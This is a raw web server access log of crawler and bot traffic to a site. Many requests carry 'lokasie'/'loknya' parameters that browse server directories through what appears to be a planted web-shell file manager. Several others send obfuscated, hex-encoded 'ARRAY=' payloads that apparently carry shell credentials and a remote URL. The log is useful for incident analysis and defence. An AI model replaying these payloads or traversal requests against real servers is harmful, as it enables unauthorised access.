66.249.72.70 - - [21/Jul/2026:12:19:21 +0000] "GET /detail/1999457272 HTTP/1.1" 200 28928 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:12:19:22 +0000] "GET /sitemap-7.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-block-supports.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 3438 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:19:25 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fms-options.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 1647 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:19:28 +0000] "GET /sitemap-7.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Foptions-head.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 1880 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:19:31 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-simplepie-sanitize-kses.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2426 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:19:34 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fbookmark.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 6058 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:19:37 +0000] "GET /sitemap-9.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fms-files.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2737 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.75.236.134 - - [21/Jul/2026:12:19:38 +0000] "GET /items/B396250092/ HTTP/2" 404 3165 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.72.69 - - [21/Jul/2026:12:19:38 +0000] "GET /detail/916349435 HTTP/1.1" 200 30088 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:12:19:40 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fregistration.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 1643 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:19:05 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fnav-menu-template.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 8252 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.250.235.158 - - [21/Jul/2026:12:17:06 +0000] "GET /?ARRAY=7o2230223n313738343633393832362p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343633363232362q6164393530643134623433623666366235393338626238623830656465353434222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
216.73.216.117 - - [21/Jul/2026:12:19:08 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fsitemaps.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2553 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:19:11 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-walker-category.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 4062 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.68.247.223 - - [21/Jul/2026:12:19:16 +0000] "GET /items/B396382537/ HTTP/2" 404 3164 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:12:19:18 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fview-transitions.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 1796 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:12:19:18 +0000] "GET /detail/1370870153 HTTP/1.1" 200 30171 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
92.222.108.116 - - [21/Jul/2026:12:19:28 +0000] "GET /items/B396365730/ HTTP/2" 404 3166 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.72.69 - - [21/Jul/2026:12:19:27 +0000] "GET /detail/4398421994 HTTP/1.1" 200 30546 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
192.250.235.158 - - [21/Jul/2026:12:17:28 +0000] "GET /?ARRAY=7o2230223n313738343633393834382p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343633363234382q3639363737643165323234326362383534646535653336363336306464636566222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
66.249.72.69 - - [21/Jul/2026:12:19:42 +0000] "GET /detail/4811688445 HTTP/1.1" 200 30494 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:12:19:43 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Flink-template.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 32139 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
37.59.204.157 - - [21/Jul/2026:12:19:46 +0000] "GET /items/B396246630/ HTTP/2" 404 3165 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:12:19:46 +0000] "GET /sitemap-9.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Ffonts.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 4300 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:12:19:45 +0000] "GET /cate-76-246 HTTP/1.1" 200 29834 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:12:19:49 +0000] "GET /sitemap-15.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fms-delete-site.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 3548 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:12:19:48 +0000] "GET /detail/7096896562 HTTP/1.1" 200 29684 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:12:19:52 +0000] "GET /sitemap-19.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fprofile.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 1680 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:19:55 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fcontribute.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 3634 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:19:58 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fmoderation.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 1671 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:20:01 +0000] "GET /sitemap-9.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fms-upgrade-network.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 1652 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:20:04 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fabout.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 6770 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
94.23.188.208 - - [21/Jul/2026:12:20:04 +0000] "GET /items/B396092200/ HTTP/2" 404 3167 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
57.141.0.42 - - [21/Jul/2026:12:20:06 +0000] "GET /items/B394602869/ HTTP/2" 429 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Edg/145.0.0.0 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
192.250.235.158 - - [21/Jul/2026:12:17:50 +0000] "GET /?ARRAY=7o2230223n313738343633393837302p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343633363237302q6131613638393737333132636432313063323133343264303939323537616163222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
5.39.1.240 - - [21/Jul/2026:12:19:55 +0000] "GET /items/B396231467/ HTTP/2" 404 3166 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
192.250.235.158 - - [21/Jul/2026:12:18:12 +0000] "GET /?ARRAY=7o2230223n313738343633393839322p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343633363239322q6534343436393634323836313665653239383362626361643361353364363764222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
216.73.216.117 - - [21/Jul/2026:12:20:12 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fcanonical.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 10951 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.241.56 - - [21/Jul/2026:12:20:13 +0000] "GET /index.php?lokasie=/bin/ps2epsi&loknya=/bin HTTP/2" 429 0 "https://www.laundrybandung.id/index.php?loknya=/bin" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.117 - - [21/Jul/2026:12:20:14 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fcontribute.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 3634 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:20:17 +0000] "GET /sitemap-9.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-recovery-mode-link-service.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2684 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
37.59.204.143 - - [21/Jul/2026:12:20:18 +0000] "GET /items/B395985800/ HTTP/2" 404 3164 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:12:20:20 +0000] "GET /sitemap-9.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Flink-add.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 1980 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:20:23 +0000] "GET /sitemap-15.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fupgrade.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 3731 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:20:26 +0000] "GET /sitemap-17.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fcontribute.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 3634 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:20:29 +0000] "GET /sitemap-15.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fadmin-footer.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 2597 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:20:32 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass-wp-recovery-mode-key-service.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 2965 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.250.235.158 - - [21/Jul/2026:12:18:34 +0000] "GET /?ARRAY=7o2230223n313738343633393931342p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343633363331342q6666616463663739373830633530623534353138613336633439396363323362222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
216.73.216.117 - - [21/Jul/2026:12:20:35 +0000] "GET /sitemap-13.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Foptions-discussion.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 6350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:20:38 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Foptions-privacy.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 4990 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
51.75.236.151 - - [21/Jul/2026:12:20:40 +0000] "GET /items/B395924203/ HTTP/2" 404 3166 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:12:20:41 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Flink-manager.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 3429 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:20:44 +0000] "GET /sitemap-17.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Foptions-discussion.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 6350 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
5.39.1.233 - - [21/Jul/2026:12:20:47 +0000] "GET /items/B395872846/ HTTP/2" 404 3167 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:12:20:47 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fprivacy-policy-guide.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 3008 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:20:50 +0000] "GET /sitemap-10.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fmedia-upload.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 3004 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:20:53 +0000] "GET /sitemap-1.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin%2Fmedia.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-admin HTTP/2" 404 1900 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
5.39.1.253 - - [21/Jul/2026:12:20:56 +0000] "GET /items/B395862151/ HTTP/2" 404 3167 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:12:20:56 +0000] "GET /sitemap.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-content%2Findex.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-content HTTP/2" 404 1533 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.250.235.158 - - [21/Jul/2026:12:18:56 +0000] "GET /?ARRAY=7o2230223n313738343633393933362p2231223n22687474703n5p2s5p2s6877623235307631312r747269616465732r73686s705p2s3s6p633q7068705s636s64655s6n6326743q313738343633363333362q3565653362626631646561303933366132303765613733316533636664306138222p2232223n226636393832313739316462646532623335343262366335653632643861373831222p2233223n226434626232353337323331663838336165383538363561663665363532323133222p226175746s5s66696p655s6r616q65223n2266696p6566756r732r706870222p226175746s5s70617373223n2232302q34312q36302q36352q37312q38332q3136222p2262696r675s70617373223n2232362q34332q35372q36372q37322q38352q3138227q HTTP/1.1" 500 384 "-" "-"
66.249.72.71 - - [21/Jul/2026:12:21:01 +0000] "GET /detail/4632746248 HTTP/1.1" 200 30191 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
5.39.1.250 - - [21/Jul/2026:12:21:03 +0000] "GET /items/B395806940/ HTTP/2" 404 3166 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.72.70 - - [21/Jul/2026:12:21:09 +0000] "GET /cate-61-82 HTTP/1.1" 200 30237 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:12:21:11 +0000] "GET /sitemap-7.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fscript-loader.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 43787 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
57.141.0.8 - - [21/Jul/2026:12:21:13 +0000] "GET /items/B397384518/ HTTP/2" 429 0 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 (compatible; meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler))"
74.7.241.56 - - [21/Jul/2026:12:21:14 +0000] "GET /index.php?lokasie=/bin/pod2man&loknya=/bin HTTP/2" 429 0 "https://www.laundrybandung.id/index.php?loknya=/bin" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.4; +https://openai.com/gptbot)"
216.73.216.117 - - [21/Jul/2026:12:21:14 +0000] "GET /sitemap-5.xml?loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fcertificates HTTP/2" 404 2130 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
176.31.139.9 - - [21/Jul/2026:12:21:14 +0000] "GET /items/B395769811/ HTTP/2" 404 3071 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.117 - - [21/Jul/2026:12:21:17 +0000] "GET /sitemap-10.xml?loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fsitemaps HTTP/2" 404 2307 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:21:20 +0000] "GET /sitemap-5.xml?loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fbuild HTTP/2" 404 2249 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
66.249.72.69 - - [21/Jul/2026:12:21:22 +0000] "GET /items/C097429534/?loknya=/ HTTP/1.1" 200 30154 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:12:21:23 +0000] "GET /sitemap-14.xml?loknya=%2Fhome%2Fvmxfzbqj%2F.sitepad HTTP/2" 404 1921 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
92.222.104.212 - - [21/Jul/2026:12:21:23 +0000] "GET /items/B395734188/ HTTP/2" 404 3165 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
66.249.72.69 - - [21/Jul/2026:12:21:25 +0000] "GET /detail/3660590418 HTTP/1.1" 200 30290 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/150.0.7871.128 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
216.73.216.117 - - [21/Jul/2026:12:21:26 +0000] "GET /sitemap-5.xml?lokasie=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fclass.wp-scripts.php&loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes HTTP/2" 404 1696 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.117 - - [21/Jul/2026:12:21:29 +0000] "GET /sitemap-5.xml?loknya=%2Fhome%2Fvmxfzbqj%2Fpublic_html%2Fwp-includes%2Fsodium_compat HTTP/2" 404 2341 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
